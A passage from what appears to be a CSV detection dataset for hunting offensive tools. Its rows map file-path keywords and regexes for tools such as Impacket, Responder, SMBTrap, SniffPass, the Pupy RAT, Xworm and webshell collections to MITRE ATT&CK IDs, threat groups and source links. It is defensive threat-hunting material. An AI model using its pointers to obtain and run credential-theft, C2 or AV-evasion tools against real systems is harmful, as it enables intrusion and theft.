SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18898" "*\smbrelayserver.py*",".{0,1000}\\smbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","18899" "*\SMBRelay-Session.txt*",".{0,1000}\\SMBRelay\-Session\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18900" "*\smbrelayx.exe*",".{0,1000}\\smbrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18901" "*\smbrelayx.py*",".{0,1000}\\smbrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18902" "*\smbscan-*.csv*",".{0,1000}\\smbscan\-.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","18903" "*\smbscan-*.log*",".{0,1000}\\smbscan\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","18904" "*\smbscan.py*",".{0,1000}\\smbscan\.py.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","18905" "*\smbserver.py*",".{0,1000}\\smbserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for 
working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18906" "*\SMBSigningNotRequired.txt*",".{0,1000}\\SMBSigningNotRequired\.txt.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","0","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","18907" "*\smbsr.db*",".{0,1000}\\smbsr\.db.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","18908" "*\smbsr.log*",".{0,1000}\\smbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","18909" "*\smbsr.py*",".{0,1000}\\smbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB 
shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","18910" "*\smbsr_results.csv*",".{0,1000}\\smbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","18911" "*\smbtrap2.py*",".{0,1000}\\smbtrap2\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","18912" "*\smbtrap-mitmproxy-inline.py*",".{0,1000}\\smbtrap\-mitmproxy\-inline\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","18913" "*\Smeagol.log*",".{0,1000}\\Smeagol\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - 
TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18914" "*\SMTP-Clear-Text-Password-*.txt*",".{0,1000}\\SMTP\-Clear\-Text\-Password\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","18915" "*\smuggler.py*",".{0,1000}\\smuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","N/A","9","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","18916" "*\SmugglingCmdlet.csproj*",".{0,1000}\\SmugglingCmdlet\.csproj.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","18917" "*\SmugglingCmdlet.sln*",".{0,1000}\\SmugglingCmdlet\.sln.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","18918" "*\Snaffler.exe*",".{0,1000}\\Snaffler\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18919" "*\Snaffler.exe*",".{0,1000}\\Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18920" "*\snaffler.py*",".{0,1000}\\snaffler\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","18921" "*\sniff.py*",".{0,1000}\\sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18922" "*\sniff.py*",".{0,1000}\\sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18923" "*\sniffer.exe*",".{0,1000}\\sniffer\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18924" "*\sniffer.py*",".{0,1000}\\sniffer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","18925" "*\sniffer.py*",".{0,1000}\\sniffer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","18926" "*\sniffers\sniffer.py*",".{0,1000}\\sniffers\\sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","18927" "*\SniffPass.chm*",".{0,1000}\\SniffPass\.chm.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential 
Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18928" "*\SniffPass.pdb*",".{0,1000}\\SniffPass\.pdb.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18929" "*\sniffpass-x64*",".{0,1000}\\sniffpass\-x64.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","18930" "*\SnIpEr_SA Shell.php*",".{0,1000}\\SnIpEr_SA\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18931" "*\snsenum.py*",".{0,1000}\\snsenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","18932" "*\SOAPHound.csproj*",".{0,1000}\\SOAPHound\.csproj.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services 
(ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18933" "*\SOAPHound.exe*",".{0,1000}\\SOAPHound\.exe.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18934" "*\SOAPHound.sln*",".{0,1000}\\SOAPHound\.sln.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18935" "*\SOAPHound\Enums\*",".{0,1000}\\SOAPHound\\Enums\\.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18936" "*\SOAPHound\Program.cs*",".{0,1000}\\SOAPHound\\Program\.cs.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18937" "*\SOAPHound-master*",".{0,1000}\\SOAPHound\-master.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - 
T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","18938" "*\socks5proxy.py*",".{0,1000}\\socks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","18939" "*\Software\Kidlogger*",".{0,1000}\\Software\\Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#registry","registry","10","10","N/A","N/A","N/A","N/A","18957" "*\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\fun*",".{0,1000}\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\fun.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/Imanfeng/Telemetry","1","0","#registry","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","18963" "*\SOFTWARE\Policies\Sinclair Community College\Make Me Admin*",".{0,1000}\\SOFTWARE\\Policies\\Sinclair\sCommunity\sCollege\\Make\sMe\sAdmin.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#registry","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","18970" "*\SOFTWARE\Sinclair Community College\Make Me Admin*",".{0,1000}\\SOFTWARE\\Sinclair\sCommunity\sCollege\\Make\sMe\sAdmin.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#registry","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","18971" "*\SOFTWARE\Xworm*",".{0,1000}\\SOFTWARE\\Xworm.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#registry","N/A","10","","N/A","","","","18987" "*\SolarFlare.exe*",".{0,1000}\\SolarFlare\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18989" "*\somalifuscatorv2.log*",".{0,1000}\\somalifuscatorv2\.log.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","19019" "*\Sophos Removal Tool.ps1*",".{0,1000}\\Sophos\sRemoval\sTool\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19020" "*\SortObjectCommand.cs",".{0,1000}\\SortObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19021" "*\specagents.py*",".{0,1000}\\specagents\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19023" "*\specmodule.py*",".{0,1000}\\specmodule\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","19024" 